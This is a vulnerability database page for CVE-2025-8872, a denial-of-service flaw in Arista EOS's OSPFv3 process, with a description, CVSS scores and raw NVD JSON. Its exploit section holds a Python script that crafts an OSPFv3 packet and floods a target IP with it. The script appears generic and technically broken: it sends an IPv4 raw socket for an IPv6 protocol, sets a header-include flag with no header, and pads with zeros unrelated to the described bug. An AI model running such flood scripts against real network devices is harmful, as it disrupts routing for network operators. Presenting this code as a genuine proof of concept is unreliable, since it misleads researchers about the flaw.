Security Vulnerability Report
中文
CVE-2025-8872 CVSS 6.5 MEDIUM

CVE-2025-8872

Published: 2025-12-16 20:15:49
Last Modified: 2026-04-15 00:35:42
Source: [email protected]

Description

On affected platforms running Arista EOS with OSPFv3 configured, a specially crafted packet can cause the OSFPv3 process to have high CPU utilization which may result in the OSFPv3 process being restarted. This may cause disruption in the OSFPv3 routes on the switch. This issue was discovered internally by Arista and is not aware of any malicious uses of this issue in customer networks.

CVSS Details

CVSS Score
6.5
Severity
MEDIUM
CVSS Vector
CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:N/I:N/A:H

Configurations (Affected Products)

No configuration data available.

Arista EOS(配置OSPFv3的特定版本,需参考官方公告)

PoC / Exploit Code

⚠ For Security Research Only
The following code is for security research and authorized testing only.
python
#!/usr/bin/env python3 """ CVE-2025-8872 PoC - Arista EOS OSPFv3 DoS This PoC demonstrates sending a malformed OSPFv3 packet to trigger high CPU usage. Note: This is for educational and authorized testing purposes only. """ import socket import struct import random def create_osfpv3_hello_packet(): """Create a malformed OSPFv3 Hello packet""" version = 3 # OSPFv3 packet_type = 1 # Hello # OSPFv3 Header header = struct.pack('!BBHII', version, packet_type, 0, # Packet length (will be calculated) 0x00000000, # Router ID 0x00000000 # Area ID ) # Add OSPFv3 Hello body with potential trigger data hello_body = struct.pack('!IHHH', 0x00000000, # Interface ID 0x0002, # Priority 0x00000000, # Options 0x0000 # HelloInterval ) # Add padding/extra data to trigger parsing issue padding = b'\x00' * 100 packet = header + hello_body + padding # Update packet length packet = bytes([version, packet_type]) + struct.pack('!H', len(packet)) + packet[4:] return packet def send_malformed_packet(target_ip, target_port=89): """Send malformed OSPFv3 packet to target""" sock = socket.socket(socket.AF_INET, socket.SOCK_RAW, 89) # OSPF protocol sock.setsockopt(socket.IPPROTO_IP, socket.IP_HDRINCL, 1) packet = create_osfpv3_hello_packet() try: sock.sendto(packet, (target_ip, target_port)) print(f"[*] Malformed OSPFv3 packet sent to {target_ip}:{target_port}") except Exception as e: print(f"[!] Error sending packet: {e}") finally: sock.close() def send_flood_attack(target_ip, count=100): """Send multiple malformed packets""" print(f"[*] Starting OSPFv3 flood attack on {target_ip}") for i in range(count): send_malformed_packet(target_ip) print(f"[*] Sent {count} packets") if __name__ == "__main__": import sys if len(sys.argv) < 2: print("Usage: python cve_2025_8872_poc.py <target_ip>") sys.exit(1) target = sys.argv[1] send_flood_attack(target, count=50)

References

Raw JSON Data

JSON
{"cve": {"id": "CVE-2025-8872", "sourceIdentifier": "[email protected]", "published": "2025-12-16T20:15:49.460", "lastModified": "2026-04-15T00:35:42.020", "vulnStatus": "Deferred", "cveTags": [], "descriptions": [{"lang": "en", "value": "On affected platforms running Arista EOS with OSPFv3 configured, a specially crafted packet can cause the OSFPv3 process to have high CPU utilization which may result in the OSFPv3 process being restarted. This may cause disruption in the OSFPv3 routes on the switch.\n\nThis issue was discovered internally by Arista and is not aware of any malicious uses of this issue in customer networks."}], "metrics": {"cvssMetricV40": [{"source": "[email protected]", "type": "Secondary", "cvssData": {"version": "4.0", "vectorString": "CVSS:4.0/AV:N/AC:L/AT:N/PR:L/UI:N/VC:N/VI:N/VA:H/SC:N/SI:N/SA:N/E:X/CR:X/IR:X/AR:X/MAV:X/MAC:X/MAT:X/MPR:X/MUI:X/MVC:X/MVI:X/MVA:X/MSC:X/MSI:X/MSA:X/S:X/AU:X/R:X/V:X/RE:X/U:X", "baseScore": 7.1, "baseSeverity": "HIGH", "attackVector": "NETWORK", "attackComplexity": "LOW", "attackRequirements": "NONE", "privilegesRequired": "LOW", "userInteraction": "NONE", "vulnConfidentialityImpact": "NONE", "vulnIntegrityImpact": "NONE", "vulnAvailabilityImpact": "HIGH", "subConfidentialityImpact": "NONE", "subIntegrityImpact": "NONE", "subAvailabilityImpact": "NONE", "exploitMaturity": "NOT_DEFINED", "confidentialityRequirement": "NOT_DEFINED", "integrityRequirement": "NOT_DEFINED", "availabilityRequirement": "NOT_DEFINED", "modifiedAttackVector": "NOT_DEFINED", "modifiedAttackComplexity": "NOT_DEFINED", "modifiedAttackRequirements": "NOT_DEFINED", "modifiedPrivilegesRequired": "NOT_DEFINED", "modifiedUserInteraction": "NOT_DEFINED", "modifiedVulnConfidentialityImpact": "NOT_DEFINED", "modifiedVulnIntegrityImpact": "NOT_DEFINED", "modifiedVulnAvailabilityImpact": "NOT_DEFINED", "modifiedSubConfidentialityImpact": "NOT_DEFINED", "modifiedSubIntegrityImpact": "NOT_DEFINED", "modifiedSubAvailabilityImpact": "NOT_DEFINED", "Safety": "NOT_DEFINED", "Automatable": "NOT_DEFINED", "Recovery": "NOT_DEFINED", "valueDensity": "NOT_DEFINED", "vulnerabilityResponseEffort": "NOT_DEFINED", "providerUrgency": "NOT_DEFINED"}}], "cvssMetricV31": [{"source": "[email protected]", "type": "Secondary", "cvssData": {"version": "3.1", "vectorString": "CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:N/I:N/A:H", "baseScore": 6.5, "baseSeverity": "MEDIUM", "attackVector": "NETWORK", "attackComplexity": "LOW", "privilegesRequired": "LOW", "userInteraction": "NONE", "scope": "UNCHANGED", "confidentialityImpact": "NONE", "integrityImpact": "NONE", "availabilityImpact": "HIGH"}, "exploitabilityScore": 2.8, "impactScore": 3.6}]}, "weaknesses": [{"source": "[email protected]", "type": "Secondary", "description": [{"lang": "en", "value": "CWE-400"}]}], "references": [{"url": "https://www.arista.com/en/support/advisories-notices/security-advisory/23115-security-advisory-0128", "source": "[email protected]"}]}}
Disclaimer

This information is for security research and authorized penetration testing only. Unauthorized testing of other systems is illegal.